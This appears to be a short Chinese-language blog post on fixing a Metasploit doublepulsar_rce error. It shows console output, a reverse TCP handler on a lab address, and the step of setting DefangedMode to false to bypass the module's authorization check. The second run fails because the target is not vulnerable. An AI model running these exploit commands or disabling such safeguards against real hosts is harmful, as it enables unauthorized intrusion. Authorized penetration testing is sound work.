doublepulsar msf 执行报错解决
在检查服务器是否存在漏洞的过程中,发现exploit
报错,
报错信息如下,已经很明显了 Disable the DefangedMode option if you have authorization to proceed.
,没有正确设置好参数
msf5 exploit(windows/smb/doublepulsar_rce) > exploit
[*] Started reverse TCP handler on 192.168.124.144:4444
[-] 192.168.124.134:445 - Exploit aborted due to failure: bad-config:
Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.
Disable the DefangedMode option if you have authorization to proceed.
[*] Exploit completed, but no session was created.
查看存在的值 有哪些可以设置
msf5 exploit(windows/smb/doublepulsar_rce) > set DefangedMode
set DefangedMode false set DefangedMode true
设置为 false
再执行就可以了
msf5 exploit(windows/smb/doublepulsar_rce) > exploit
[*] Started reverse TCP handler on 192.168.124.144:4444
[-] 192.168.124.134:445 - Exploit aborted due to failure: not-vulnerable: Unable to proceed without DOUBLEPULSAR
[*] Exploit completed, but no session was created.
以上
BR